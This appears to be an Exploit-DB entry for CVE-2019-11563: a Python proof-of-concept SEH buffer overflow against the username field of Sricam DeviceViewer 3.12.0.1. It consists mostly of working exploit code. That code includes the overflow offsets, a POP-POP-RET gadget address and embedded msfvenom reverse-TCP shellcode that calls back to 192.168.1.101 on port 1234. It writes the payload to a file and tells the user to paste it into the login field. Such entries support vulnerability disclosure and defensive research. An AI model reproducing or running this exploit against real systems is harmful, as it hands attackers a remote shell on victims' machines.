DeviceViewer 3.12.0.1 - 'user' SEH Overflow

EDB-ID:

46779


Platform:

Windows

Published:

2019-04-30

# Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow (PoC)
# Discovery Date: 25/04/2019
# Exploit Author: Hayden Wright
# Vendor Homepage: www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows XP Pro x64, Windows 7 32bit
# CVE : CVE-2019-11563

#!/usr/bin/python
import struct

#------------------------------------------------------------#
# CVE-2019-11563                                             #
#                                                            #
# Sricam DeviceViewer.exe 'username' field SEH overflow      #
# by Hayden Wright                                           #
#                                                            #
# (*) badchars = '\x00\x0a\x0d'                              #
# (*) SEH = 0x6a413969 OFFSET 268                            #
# (*) nSEH = 268 -4                                          #
#                                                            #
#  69901d06  5E  POP ESI                                     #
#  69901d07  5F  POP EDI                                     #
#  69901d08  C3  RETN                                        #
#                                                            #
#------------------------------------------------------------#

#msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.1.101 -f c -b '\x00\x0a\x0d' -a x86 --platform windows EXITFUNC=seh

shellcode =(
"\xb8\x51\x9c\x1c\xa4\xda\xc9\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x52\x31\x42\x12\x83\xea\xfc\x03\x13\x92\xfe\x51\x6f\x42\x7c"
"\x99\x8f\x93\xe1\x13\x6a\xa2\x21\x47\xff\x95\x91\x03\xad\x19"
"\x59\x41\x45\xa9\x2f\x4e\x6a\x1a\x85\xa8\x45\x9b\xb6\x89\xc4"
"\x1f\xc5\xdd\x26\x21\x06\x10\x27\x66\x7b\xd9\x75\x3f\xf7\x4c"
"\x69\x34\x4d\x4d\x02\x06\x43\xd5\xf7\xdf\x62\xf4\xa6\x54\x3d"
"\xd6\x49\xb8\x35\x5f\x51\xdd\x70\x29\xea\x15\x0e\xa8\x3a\x64"
"\xef\x07\x03\x48\x02\x59\x44\x6f\xfd\x2c\xbc\x93\x80\x36\x7b"
"\xe9\x5e\xb2\x9f\x49\x14\x64\x7b\x6b\xf9\xf3\x08\x67\xb6\x70"
"\x56\x64\x49\x54\xed\x90\xc2\x5b\x21\x11\x90\x7f\xe5\x79\x42"
"\xe1\xbc\x27\x25\x1e\xde\x87\x9a\xba\x95\x2a\xce\xb6\xf4\x22"
"\x23\xfb\x06\xb3\x2b\x8c\x75\x81\xf4\x26\x11\xa9\x7d\xe1\xe6"
"\xce\x57\x55\x78\x31\x58\xa6\x51\xf6\x0c\xf6\xc9\xdf\x2c\x9d"
"\x09\xdf\xf8\x32\x59\x4f\x53\xf3\x09\x2f\x03\x9b\x43\xa0\x7c"
"\xbb\x6c\x6a\x15\x56\x97\xfd\xda\x0f\x96\x98\xb2\x4d\x98\x66"
"\x91\xdb\x7e\x0c\x05\x8a\x29\xb9\xbc\x97\xa1\x58\x40\x02\xcc"
"\x5b\xca\xa1\x31\x15\x3b\xcf\x21\xc2\xcb\x9a\x1b\x45\xd3\x30"
"\x33\x09\x46\xdf\xc3\x44\x7b\x48\x94\x01\x4d\x81\x70\xbc\xf4"
"\x3b\x66\x3d\x60\x03\x22\x9a\x51\x8a\xab\x6f\xed\xa8\xbb\xa9"
"\xee\xf4\xef\x65\xb9\xa2\x59\xc0\x13\x05\x33\x9a\xc8\xcf\xd3"
"\x5b\x23\xd0\xa5\x63\x6e\xa6\x49\xd5\xc7\xff\x76\xda\x8f\xf7"
"\x0f\x06\x30\xf7\xda\x82\x4e\x09\xd6\x1e\xc6\xb0\x83\x62\x8a"
"\x42\x7e\xa0\xb3\xc0\x8a\x59\x40\xd8\xff\x5c\x0c\x5e\xec\x2c"
"\x1d\x0b\x12\x82\x1e\x1e")

max_size = 4000

buf = 'A'*264
buf += '\xeb\x06\x90\x90'            #jump short 6-bytes
buf += struct.pack('<I', 0x69901d06) #POP ESI, POP EDI, RET  avformat-54.dll
buf += '\x90' * 16
buf += shellcode
buf += 'C'*(max_size - len(buf))

print '[+] %s bytes buffer created...' %len(buf)

try:
    filename = 'CVE-2019-11563.txt'
    file = open(filename , 'w')
    file.write(buf)
    print '[+] Evil buffer saved to file: ' + filename
    print '[+] Copy + paste its contents into the "user" field and hit login'
    file.close()
except:
    print "[!] Could not create file!"